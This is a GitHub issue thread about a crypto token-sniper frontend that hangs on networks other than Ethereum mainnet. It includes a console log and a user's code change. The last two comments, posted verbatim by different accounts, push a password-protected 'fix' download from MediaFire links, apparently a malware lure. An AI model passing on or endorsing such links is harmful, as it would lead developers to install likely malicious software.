### ISSUE TITLE
It doesn't work on other chains other than Ethereum mainnet

### ISSUE THREAD

**Issue by luggys** [anysniper/Frontend#10]
It just only works on Ethereum mainnet. When I switch to other network(BSC) the page stucks at loading screen.

![anysniper_issue](https://user-images.githubusercontent.com/125102317/218229182-32a0b059-3239-4a66-910f-5cb14caa2645.png)

**Comment by anysniper** [comment]
You can open developer console by pressing `F12` or right click => Inspect.

And see what's wrong. Maybe this is because of wrong configration like contract address in config.js

You can share your console log

**Comment by Varjokettu** [comment]
> You can open developer console by pressing `F12` or right click => Inspect.
> 
> And see what's wrong. Maybe this is because of wrong configration like contract address in config.js
> 
> You can share your console log

Wait what!
Owner still replying here!?

Why wouldn't you deal with the Nigerian scammers that runs the Telegram chat?

**Comment by luggys** [comment]
> You can open developer console by pressing `F12` or right click => Inspect.
> 
> And see what's wrong. Maybe this is because of wrong configration like contract address in config.js
> 
> You can share your console log

Here is the console log

> [HMR] Waiting for update signal from WDS...
vue.runtime.esm.js?2b0e:8784 Download the Vue Devtools extension for a better development experience:
https://github.com/vuejs/vue-devtools
accounts.js?1e66:212 account fetch error TypeError: accountsJSON is not iterable
    at Store.fetch (accounts.js?1e66:206:1)
    at Array.wrappedActionHandler (vuex.esm.js?2f62:851:1)
    at Store.dispatch (vuex.esm.js?2f62:516:1)
    at Store.boundDispatch [as dispatch] (vuex.esm.js?2f62:406:1)
    at Vue.eval (index.js?4360:47:1)
    at invokeWithErrorHandling (vue.runtime.esm.js?2b0e:3017:1)
    at Vue.$emit (vue.runtime.esm.js?2b0e:3716:1)
    at Web3Helper.initAccount (Web3.js?7459:308:1)
    at async Vue.eval (Web3.js?7459:233:1)
28App.vue?234e:158 Error: Returned values aren't valid, did it run Out of Gas? You might also see this error if you are not using the correct ABI for the contract you are retrieving data from, requesting data from a block number that does not exist, or querying a node which is not fully synced.
    at f.decodeParametersWith (web3.min.js?c0d8:2:1)
    at f.decodeParameters (web3.min.js?c0d8:2:1)
    at y._decodeMethodReturn (web3.min.js?c0d8:2:1)
    at m.outputFormatter (web3.min.js?c0d8:2:1)
    at m.formatOutput (web3.min.js?c0d8:2:1)
    at a (web3.min.js?c0d8:2:1)
    at a (web3.min.js?c0d8:2:1)
    at h.run (web3.min.js?c0d8:2:1)
    at l (web3.min.js?c0d8:2:1)

>

**Comment by luggys** [comment]
I solve the issue by changing;

src\store\modules\accounts.js line 206
`      for (let account in accountsJSON) {`

src\helpers\web3.js line 370 and 371

`    const web3 = new Web3(new Web3.providers.HttpProvider(Config.MAINNET_RPC));`
`    const sniper = new web3.eth.Contract(ABI.TokenABI, Config.SNIPER_ADDRESS);`

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
